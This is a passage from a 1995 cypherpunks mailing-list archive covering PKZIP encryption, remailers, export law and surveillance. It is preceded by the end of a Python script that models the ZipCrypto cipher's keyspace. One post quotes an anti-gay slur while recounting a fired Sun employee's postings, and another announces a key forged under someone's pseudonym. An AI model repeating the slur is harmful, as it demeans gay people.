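    """log2 of the number of passwords of exactly `length` symbols."""
    return length * math.log2(alphabet_size)


def effective_bits(alphabet_size: int, length: int) -> float:
    """A password cannot contribute more than the cipher's 96-bit state."""
    return min(keyspace_bits(alphabet_size, length), STATE_BITS)


def comparison():
    """Figures from the post, in bits, side by side."""
    return {
        "all 5-uppercase-letter keys (26^5)": keyspace_bits(26, 5),
        # Assumption: 13 symbols drawn uniformly from 95 printable ASCII
        # characters, modelled on the post's sample "x@J60!fv_Zd4%".
        "13 random printable chars (95^13)": keyspace_bits(95, 13),
        "known-plaintext work quoted in the post": 38.0,
        "cipher internal state": float(STATE_BITS),
    }


if __name__ == "__main__":
    message = b"secret cherry cake recipe"  # constructed sample plaintext
    ct = ZipCrypto(b"x@J60!fv_Zd4%").encrypt(message)
    assert ZipCrypto(b"x@J60!fv_Zd4%").decrypt(ct) == message
    for label, bits in comparison().items():
        print(f"{label:45s} ~2^{bits:.1f}")
```

[Whatever its length, the password is folded into three 32-bit keys, so the password-guessing figures and the cipher-level figure measure different things.]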






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 23 Nov 1995 08:09:34 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <9511220545.AA01344@zorch.w3.org>
Message-ID: <g0myeD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:
> One point to be made is that at Universities we all have university accounts
> because people realise that there is no connection between our views and
> institute policy. The freedom to hold unpopular views being part of what
> universities are all about. On the other hand there is no such assumption
> concerning posts from foo.com.

People who realize this, and use a University account to make "politically
incorrect" statements, may be in for a rude surprise. Examples are posted way
too frequently to alt.censorship.

> On Phil Stromer, I don't think the Internet posts were the only point at issue.
> He was very offensive however, it was not merely the views he posted but the
> manner in which he made them that caused offense. He also made a lot of
> assertions concerning other posters which might have led to legal action
> against Sun.

It was definitely dumb of Stromer to have posted from a Sun account. However
I'm sure that if he had posted from something like Netcom, and if he were known
to work for Sun, some guardians of political correctness would have complained
to Sun anyway. When I was in grad school, people used to complain to the grad
school about my politically incorrect writings coming from this BBS, which is
not affiliated with the school in any way (some of them were even forged :).

Since I've bothered digging up the following quote, I might as well post it:
============================================================================
Philip H. Stromer:
Contrib. post:
 He was another hate-filled bigot who posted rants about homosexuality.
He became obsessed with the idea that anal sex would wear out the
muscles of the digestive tract, causing incontinence; he also posted
long gloating messages about "AIDS-infested faggots".
 Eventually, Sun Microsystems fired him for breach of contract, for
posting messages which were intimidating and harassing to other
employees.  He sued them, and lost.  Appeared again from some
commercial site or other, but soon sunk out of view.
 A salutary lesson to those who believe that the Internet is a license
to spew bigotry.
--
 Oh yeah. I've read this clown's rantings from time to time, and the one
thing that occurs to me is that he and little Danny Karnes may be the same
person. This isn't a _claim_ that they are, mind you, but you'd hardly
know any better from their posts.
--
 (from the Business section of the San Jose Mercury News,
Friday, July 31, 1992)
"Email epithets spark Sun lawsuit" by Brandon Bailey
 By his own admission, Philip Stromer liked to push the
boundaries of good taste when he sent out jokes and
political statements on his employer's electronic mail network.
 But according to a lawsuit filed this week in Santa
Clara County Superior Court, Stromer pushed too far.
 The 32-year-old technical writer says he was fired by
Sun Microsystems in April after he sent a series of
email messages that were anything but politically correct.
 The messages were posted on an electronic bulletin
board used by Sun workers to exchange jokes and
running commentary on a variety of topics unrelated to their jobs.
 "I was just trying to make conversation," Stromer
said in an interview.  "I would normally take whatever position was unpopular."
 His electronic broadsides ranged from pro-Israel
and anti-abortion arguments to jokes about AIDS
and graphic epithets about gays.  Eventually he
signed on to a nationwide computer network using
his terminal at Sun and typed what he described
as "some very extremely nasty stuff" on a bulletin
board used primarily to exchange sarcastic insults and vitriolic humor.
 A Sun spokeswoman said the company would not comment.
 The case raises interesting questions about the
increasing popularity of electronic bulletin
boards and message systems on which users can
type all kinds of outrageous statements without
having to look their audience in the eye.  Stromer
says he always signed his own name to his messages
and never meant to threaten anyone personally.
But several legal experts say that anti-discrimination
laws require management to step in when employees
create an atmosphere that is hostile or intimidating to any group.
 "An occasional joke, maybe," said Patricia Shiu, staff
attorney at the non-profit Employment Law Center in
San Francisco.  "But if an employer (allows) that kind
of thing repeatedly, he exposes himself to liability
for allowing a discriminatory environment."
 In his lawsuit, Stromer claims his bosses violated his
right to free expression.  He said he was just trying
to liven up the conversations that Sun employees routinely
conduct on a variety of email bulletin boards.  And he
compared himself with comedian Lenny Bruce.  (Stromer
said he had been scolded before but he drew his first
written reprimand from Sun for a joke about AIDS and
Magic Johnson, and another about AIDS and anal sex.)
"This type of exchange... is deemed by Sun management
to show poor judgment and blatant disregard for the
feelings of coworkers," said the reprimand.
 By Stromer's account, he was fired after he used his
work computer to hurl messages including graphic epithets
at gays across a national network.  The network automatically
identified the messages as coming from a Sun computer.
 Stromer is acting as his own attorney.  He said he sought
help from the American Civil Liberties Union and a
conservative foundation but both told him his employer
had a right to regulate his speech on company computers.
= = =
[Typed in by sf at dec and reposted w/o his permission, which is why
I'm leaving his name off / JBL]
--
 Aha. So _that's_ the reason he ceased to infest alt.flame! I just thought that
his net access had been stripped, like a kook of a different stripe (I'm
referring to the dreaded David J. Rasmussen, of course), but I probably
just ran into his post-Sun output instead.
One does wonder how working for a company justifies the posting of such
crapola via a system the company owns. Ah well...
============================================================================

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 22 Nov 1995 17:39:47 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail
Message-ID: <Pine.BSD.3.91.951122040949.28519F-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
People are complaining about junk mail.  No problem... 
 
11 21 95 The Electronic Telegraph reports: 
 
   THE European Parliament will decide today whether to 
   ban junk mail. 
 
   Euro MPs are also considering whether to outlaw credit 
   card transactions by phone and whether direct selling 
   via E-mail should be curbed. 
 
   Today's vote has been triggered by proposals from the 
   European Commission to protect consumers buying 
   goods without seeing them. 
 
 
Your complaints are highly valued at Minute Mortuary at 
2d & Main, which advertises "Privacy Knows No Limits." 
 
 
Cordially, 
 
Jim 
 
 
 
 
NOTE.  The Electronic Telegraph website's URL: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's headline: 
 
       Junk mail faces last post 
 
       Its online filename: 
 
       wjunk21.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 22 Nov 1995 17:52:42 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 2
Message-ID: <Pine.BSD.3.91.951122041137.28519G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
People are complaining about junk mail now.  Wait until 
they find out what real JUNK mail is... 
 
11 21 95 Associated Press reports: 
 
   To make electronic mail as universally available in the 
   United States as telephones, the federal government and 
   business would need to work together, the [RAND] report 
   said. 
 
 
RAND is known for generating options, but... 
 
   ...the study recommended using public funding.... 
 
 
The government --I mean, RAND-- isn't too happy about 
people owning their own computers: 
 
   As a way to reach people who don't own computers, the 
   study recommended that terminals be located in public 
   places -- street corners, community centers, libraries, 
   hotels -- just as pay phones are, so people can send and 
   receive electronic messages. 
 
 
What if people find out that this "private study," as AP calls 
it, is really JUNK mail from Joint Underhanded 'Net Kill-off? 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The NandO News website's URL: 
 
       http://www.nando.net 
 
       The newsstory's head- and datelines: 
 
       Study: Every American should have mailbox in 
       cyberspace 
 
       WASHINGTON (Nov 21, 1995 - 11:01 EST) 
 
       Its online filename: nation611_4.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 23 Nov 1995 08:02:40 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 3
Message-ID: <Pine.BSD.3.91.951122041306.28519H-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
An 11 21 95 Reuter Information Service newsstory, headed 
 
      Computer illiterates offered new way onto Internet 
 
[OR: Junk mail wants to meet computer illiterate for safe sale] 
 
reports: 
 
   Matsushita Electric Industrial Co said on Tuesday it had 
   developed a way of accessing the Internet using the fam- 
   iliar telephone and fax machine.... 
 
   With the Matsushita system, users can obtain an index 
   via a facsimile machine and choose Internet subjects 
   they are interested in by keying in numbers on their tele- 
   phones.... 
 
   The telephone and fax are connected to server comput- 
   ers.... 
 
   Information coming back arrives as ordinary sound over 
   the telephone handset or as printed text off the facsimile. 
 
 
AT&T was offering an index of newsstories in a series of 
ads in the Wall Street Journal a couple of years ago.  You 
faxed the code numbers of the stories you wanted to read 
to AT&T; and AT&T faxed back the stories. 
 
                   FIRST RULE OF JUNK MAIL 
 
If you can sell it to the elite, you can sell it to the masses. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The NandO News website URL is: 
 
       http://www.nando.net 
 
       The newsstory's dateline: 
 
       TOKYO (Nov 21, 1995 - 08:18 EST) 
 
       Its online filename: 
 
       info735_8.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 23 Nov 1995 08:05:27 +0800
To: cypherpunks@toad.com
Subject: Secrets of the Internet
Message-ID: <Pine.BSD.3.91.951122041435.28519I-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 21 95 Times of London screams that 
 
           Pedophiles use encoding devices to make 
                  secret use of Internet 
 
 
Its newsstory reports an 
 
                   Interpol conference 
 
was told that 
 
               International pedophile rings 
 
are borrowing 
 
                   an encryption system 
 
           known as PGP -- Pretty Good Privacy -- 
 
             developed in [where else!] America 
 
and 
 
   Experts estimate that it could take 10 years for computer 
   systems to crack the individual codes. 
 
 
If that's not enough to reduce you to jelly, 
 
   Police [are] also concerned at the use of a "remailing" 
   service being provided by an Internet expert in Finland 
   who will take material sent to him and remove identifica- 
   tion marks before sending it out again. 
 
 
On Monday, at the start of the two-day conference in Lon- 
don on crime against children, Detective Chief Inspector 
Bryan Drew of the UK's National Criminal Intelligence
Service said  
 
   ...although police increasingly realised the difficulties 
   posed by the Internet...as yet no one in Britain had de- 
   cided on a policy for dealing with them. 
 
and 
 
   ...the Internet and computers were among a number [of] 
   subjects being looked at by his unit.
 
 
Interim measures for "dealing with" computers and the 'Net 
abound: 
 
   As part of the Interpol work, a network of 64 liaison offi- 
   cers had been set up round the world to keep contact on 
   investigations. 
 
 
And when the State ("no one") DECIDES...? 
 
 
Cordially, 
 
Jim 
 
 
 
 
NOTE.  The NandO News website URL is: 
 
       http://www.nando.net 
 
       The newsstory's dateline is: 
 
       LONDON (Nov 21, 1995 - 01:24 EST) 
 
       Its online filename is: 
 
       info429_4.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 22 Nov 1995 17:47:13 +0800
To: cypherpunks@toad.com
Subject: rand-test
Message-ID: <Pine.BSD.3.91.951122041655.28519J-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
The following information from 
 
         CIAC Bulletin G-04:  X Authentication Vulnerability 
 
                     November 20, 1995 22:00 GMT 
 
may be of use to you: 
 
     If you cannot use DES, you can determine your expo- 
     sure to remote attackers by testing the strength of 
     your rand() function using the program rand-test; the 
     source is available as 
 
          ftp://ftp.x.org/pub/DOCS/rand-test/rand-test.c 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  To subscribe to CIAC Bulletin, email to 
 
                   ciac-listproc@llnl.gov 
 
       the one-line message 
 
 subscribe ciac-bulletin <your last name>, <your first name> 
                     <your phone number> 
 
       for example: 
 
 subscribe ciac-bulletin Adolphus, Gustavus 000-000-0000 x00 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Thu, 23 Nov 1995 01:05:38 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <Pine.SUN.3.91.951122053926.8346L-100000@akamai.pixi.com>
MIME-Version: 1.0
Content-Type: text/plain




When I tried this URL I got:

404 Not Found

The requested URL /newsroom/ntn/info/info429_4.html was not found on this 
server. 

On Tue, 21 Nov 1995, Weld Pond wrote:

> 
> Story in Nando Times
> 
> http://www2.nando.net/newsroom/ntn/info/info429_4.html
> 
> 
>       Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/
>       L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
>       Technical archives for the people  -  Bio/Electro/Crypto/Radio
> 
> 

-NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |finger netsurf@akamai.pixi.com for  >
 "  " / \ " |Honolulu, HI  96830    |full PGP key; also browse me at     >
\"  "/ G \" |Serendipitous Solutions|http://www.pixi.com/~netsurf       >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Wed, 22 Nov 1995 20:51:03 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Syrinx Remailer is no more
In-Reply-To: <acd8650b03021004a42c@[137.110.24.250]>
Message-ID: <199511221230.GAA16020@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Lance" == Lance Cottrell <loki@obscura.com> writes:


    Lance> -----BEGIN PGP SIGNED MESSAGE----- This is the kind of
    Lance> announcement which really needs to be authenticated.  I
    Lance> will leave syrinx on my list until I see a signed message
    Lance> confirming this announcement. If we do not bother to
    Lance> authenticate this kind of message, why bother with all the
    Lance> crypto, here is the mother of all denial of service
    Lance> attacks.


    Lance>         -Lance

    Lance> At 7:22 PM 11/21/95, Sam Kaplin wrote:
    >> Effective immediately syrinx@c2.org is no more. I no longer
    >> have the time to keep this remailer up and running. Perhaps
    >> somewhere down the line I will set up another one. Please
    >> remove Syrinx from your chains.

I agree with Lance. It stays in the list I distribute until I see some
authentication from Sam Kaplin.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLMX1FOTpEThrthvAQGGAQP/QwsbBb9QlCt1Oth7V3Du/E1a+dXf/OUA
hVh2VSFmwiS0vuspsOtrSHAMYC2pH7py+IIHwi+28HyaFf3tpmhZsseuDklPPo/t
8j0v8Pb4pKIumTkAJ7YhEl5HNA7atpM+7eWPe8VmE7UfPTNKmaNBlqkEuXAB9T00
LhgR4Xh5QCE=
=fDBZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. DEkel" <dekel@carmel.haifa.ac.il>
Date: Wed, 22 Nov 1995 13:09:27 +0800
To: cypherpunks@toad.com
Subject: Re: PKZIP - Encryption
Message-ID: <Pine.A32.3.91.951122064257.46049A-100000@carmel.haifa.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



    "L. DEkel" writes:
>> PKZIP Encryption:
>>
>> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc.
>> Maybe it's time to put things in the right perspective.
>>
>> One must realize (yet again) the difference between:
>> Theoretical Cryptography - and - Practical Cryptography:

    "Perry E. Metzger" writes:
> I could see why one would want to use a weak encryption system if it
> bought you something. However, good encryption systems are as cheap to
> use as bad ones. Therefore, why ever use a bad one? If the top of the
> line lock costs the same amount as a toy lock, why buy a toy?

Your remark is basically correct, here are a few clarifications:

I didn't recommend PKZIP for encryption, I said it's an Archiver that has an
option to encrypt its files, and that Practically this encryption is not so
bad as people think.
About costs: a complete system, including hardware, to support "full armor"
for a computer, is far more expensive than using PKZIP, so the question is
again of money, but that depends on what you're trying to encrypt.
If you are a bank for example, it would make sense to spend several thousands
on such a system, if you just send your friend a letter once in a while,
containing a movie list, then PKZIP is enough, you don't have to use say PGP.
A good opposite example is PGP: you could define it as an Encrypter which has
an archiving option (Of course it archives for the purpose of encryption),
so why not use PGP as an archiver instead of PKZIP ?
Because:
There is the question of convenience (security=1/convenience - postulate),
people don't like to pass their plaintext through several utils, where one
compresses it, the other encrypts etc., they want a convenient util to use.
But:
Who says this old postulate (security=1/convenience) is correct today ?
you can write a program/script/batch to do all sorts of dirty jobs, why not
write a multi-purpose: compression/encryption/mailing/etc. system ?
or just use a simple script/batch util to "glue" the different utils together ?
Of course it has been done: (here are some examples)
compression/encryption system - with HPACK archiver which uses PGP,
                                 the UC2 (PRO) archiver which uses 3DES.
encryption/mailing(sometimes with compression) system - PEM, RIPEM etc.
More problems there:
These utils are not "standard" as yet, many people say they want a
popular archiver which they know "everybody" uses, and PKZIP is among the
popular and multi-featured among the archivers, so why, they say, would they
bother to adopt an esoteric encrypter or archiver ?
The main problem:
people are not "privacy protecting" oriented, they don't care too much about
the subject.
("who will bother to crack this system just to read my mail ?")

What do we do ? Educate them of course.
That is why the spread of knowledge in the subject is so important.
(Knowledge, not unsubstantiated rumors).

All in all, there is no reason not to use a crypto system, if you think your
privacy/safety are in danger.
I claim that in this world of compromises, choosing PKZIP is not as bad as
presented, knowledge should be passed to all users about the risks involved in
the use of one system or the other, but there are too many rumors that obscure
the subject and can misguide a user, not versed in the field of cryptography.
And if you "must", choose PKZIP (it is better encrypting than none, and better
than some, like ARJ, but certainly not among the best).


,,,,,,,,,,,,,
DEkel (noXys)
'''''''''''''







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 22 Nov 1995 23:18:58 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <i6uyeD4w165w@bwalk.dm.com>
Message-ID: <199511221435.JAA06382@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:

| Moreover, I think that if someone known to work for Sun 
| posts from Netcom about Sun products, policies, and future plans,
| s/he'll have both higher credibility and higher responsibility to
| the readers than a proverbial person from the street.

	Could I suggest that people who are in this situation create a
nym-key, work through remailers, and we drop the thread?  :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 22 Nov 1995 23:32:48 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <Pine.LNX.3.91.951121134201.2872A-100000@prufrocks.scranton.com>
Message-ID: <Pine.HPP.3.91.951122092816.26394A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


This discussion is beginning to resemble one about the telephone system
about 50 years ago.  A national phone system was considered an impossibility
by many.  This is because even if AT&T  employed every female >18 years 
old as a telephone operator there weren't enough to plug and unplug all 
the connections on all the switchboards. 

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."
 
 On Tue, 21 Nov 1995, Moroni wrote:

>     There is and probably never will be a shortage of people to carry on 
> wire tapping . The term agent could be all encompassing in the future to 
> include but not be limited to the hiring of ex-federally employed 
> personnel with the talents or capacity for the talent to do wiretapping. 
> In other words there are any number of ex-CIA ,DEA, ex-military who if 
> were hired would actually save the government investigation time and 
> costs because they have already gone through security clearance. Add to 
> that the fact that most if not all FBI personnel have gone through a 
> light wiretap course to familiarize them with the rudiments of the craft.
>    All these figures add up to cover the taps in case a disaster of the 
> terroristic kind should happen. I feel that numbers are there to worry 
> people but that what the FBI is worrying about is whether it can cover 
> large ground if there is a siege like state in this country. HOWEVER, 
> there will always be those that opportunistically take advantage of 
> circumstances to set up their own invisible little fiefdoms along the 
> political and social terrain. 
>    If you ask me if there is something for them to worry about I have to 
> in all good conscience say yes , if you ask if there is something for us 
> to worry about again I have to say yes. I don't know if there is even a 
> common ground for both sides to work towards because terrorism has grown 
> to include the homegrown variety .
>  
>                      Deirdre
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 22 Nov 1995 23:24:41 +0800
To: cypherpunks@toad.com
Subject: Encryption Politics (was Re: "Dear Newt" Letter...)
Message-ID: <199511221444.JAA137201@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Phill <hallam@w3.org> wrote:

<snip + slight reformat>

>If you make it a party issue you will not only lose but risk turning the 
>clock the other way. At the moment everyone knows that the export control 
>laws are not stopping people from getting PGP. It is not a good idea to
>rub people's noses in it.

Why not? It gets the issue talked about when it otherwise wouldn't be.
The cypherpunks are the Dr. Kevorkians of stupid US export laws.

>It is easy to ignore export violations by turning a blind eye. It is 
>difficult to turn a blind eye when people are so anxious to announce what
>is going on.

Exactly. I plan to go to the Nandotimes article at URL
http://www2.nando.net/newsroom/ntn/info/info429_4.html
and see what it looks like with a few substitutions like
"cars," "highways," and "doorlocks" for words like "encode"
or "encrypt." Sarcasm is often the last refuge libertarians
have in these humor-impaired times, but it keeps me sane. :)

>Phil Z. is not having problems because he wrote PGP, he
>is having problems because he made sure the FBI couldn't pretend they
>did not know what was going on.

Well, not exactly. I believe from what I've seen here before that
it was Kelly Goen(sp?) who did this. Of course, I've advocated
everyone taking legal responsibility for Kelly's actions as a kind
of protest against creeping Naziism in "our" government (see my
"An Old Idea" post, buried somewhere in the c-punk archives).

>If you make encryption a party issue then one of those Grassley bills
>will pass and the President in power may not veto it.

Encryption _IS_ a party issue, and quite possibly an effective one
if we used it correctly, for the *Libertarian* Party! The actions
of both "major" parties would have been [IMO] bad PR if the media
decided to do their jobs (I know, big "if"). There is, of course, 
institutional L. party resistance to putting the individual right
to strong encryption on the "front burner" because our "generals,"
despite a consistent record of losing battles, insist on fighting
the last war (that is, when we aren't busy fighting each other).
<sigh>
JMR

 [Who takes this opportunity to remind SO FL cypherpunks of the
  party at 7:30PM on Wed. Nov. 29th.]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMLMw9m1lp8bpvW01AQEYggP/R/2nI8TurElr/c1haz6XNzWhUjVxZXtG
bQRs9FkHX54300G5tYW1BSe37eQ+5AT6LyjjljLdtx4nYKUSDRUHqYCs/qQkspOU
jFxfTAV8TOwMaopL4odBfgDeBVBhXRcjtsYu2rQ6WFF759TCTVYpxjhr7B8JDnR8
LoTFhEBAdTk=
=wBjX
-----END PGP SIGNATURE-----
Regards, Jim Ray --  http://www.shopmiami.com/prs/jimray

 "This year will go down in history, for the first time a civilized
  nation has full gun registration!  Our streets will be safer, our
  police more efficient, and the world will follow our lead in the
  future." -- Adolf Hitler, 1935

-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 23 Nov 1995 02:16:53 +0800
To: cypherpunks@toad.com
Subject: key for Alice as promised
Message-ID: <199511221754.JAA19505@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, I wrote:

> On Tue, 21 Nov 1995, Russell Nelson wrote:
> 
> > anonymous-remailer@shell.portal.com writes:
> > > Alice here ...
> > 
> > How do we know this for a fact?
> 
> We don't.
> 
> As an incentive for Alice to generate herself a PGP key, I hereby
> place Alice on notice that if she doesn't sign her next post, and
> provide a PGP key, I will create one for her, and steal all the
> positive (?) reputation that she has developed so far.
> 
> You have 24 hours Alice, otherwise a key gets posted to here, and to
> the keyservers with your nym on it.

Well 24 hours have passed, and Alice remains unrepentant:

On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:

> Alice here ...
> 
> No, *I* am the real Alice, and I refuse to use PGP signing.

So here we go Alice's key:

Type bits/keyID    Date       User ID
pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks@toad.com>
          Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55


Anything posted without being signed by the above key isn't from me.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLNjIIbu8OQjKS7RAQETOAQAjLmudAEP/z61BylOtyFhCif5U/BrQ2Pd
uWLdy12Z16YVpczNEXeHDztsIE1BTNeGrb85OJywqc3G0M5WU9zzIRY+QlgPJzzJ
CFx5danXzVr5A6Bmp2TponUZ4mE1qNoDfANlHMt4nSV1Fn4JqU89sJx7WSmQE0o5
KlPw3Yo4E48=
=eOri
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 23 Nov 1995 00:04:07 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121234629.2539B-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951122095930.22711D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


This discussion puzzles me.  I thought we were bombarded with 
reputational goods all the time:  brand names, stocks (what is a purchase 
in the 2ndary market but a purchase of reputation most of the time?), 
degrees from famous universities.  Anonymity complicates matters only if 
no system of unique ID is used.  Throw in digital signatures and we are 
back at brand names, aren't we?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 23 Nov 1995 00:00:23 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Spam the Sign!
In-Reply-To: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.SUN.3.91.951122100156.22711E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[regarding suggestion that netscape give mit or someone a 128 bit version 
to place on an ftp server]

This is not an apology for the ITAR, just my usual lawyerly overcaution:

Suppose A gives B a program that is export controlled, intending for B to 
allow it to be exported.  Has A conspired with B to export the program?

Let's ask the grand jury investigating Phil....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 23 Nov 1995 02:56:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <acd75bfd090210044420@[205.199.118.202]>
Message-ID: <199511221809.KAA21408@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Romania or Bulgaria, or even Russia. They may still have
> the old listening infrastructure in place, although I
> hear that Stasi headquarters in the former DDR is now an
> acupuncture clinic.

The Stasi listening infrastructure wasn't solely in their
headquarters. Listening stations for terrestrial frequencies were
spread along the borders, notably here is the station on the Brocken,
a mountain in the Harz. The central station for interception of
satellite traffic (read: international telephone communication, even
when not entering or leaving the country) was located in Biesenthal, a
small town near Berlin.

It's hard to reconstruct what part of interception took place in the
Stasi HQ, my guess is that all international telephone traffic leaving
or entering the country was intercepted there. For technical reasons
it was impossible to intercept all domestic traffic from a single
central location, the telephone system worked on a purely mechanical
basis. It seems that almost all of the telephone surveillance
equipment was destroyed during the revolution or shortly after.

Things look different for the mentioned radio equipment. The Stasi
used a combination of Russian and self-made technology. The
top-of-the-notch Russian equipment is back in Russia. But most of the
Russian equipment was sold by the Russian guards (their pay is
_really_ low, even more so when compared to western money), the Stasi
equipment was forgotten about and eventually stolen. This equipment is
now mainly in the hands of about 3 or 4 individuals.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 23 Nov 1995 02:50:14 +0800
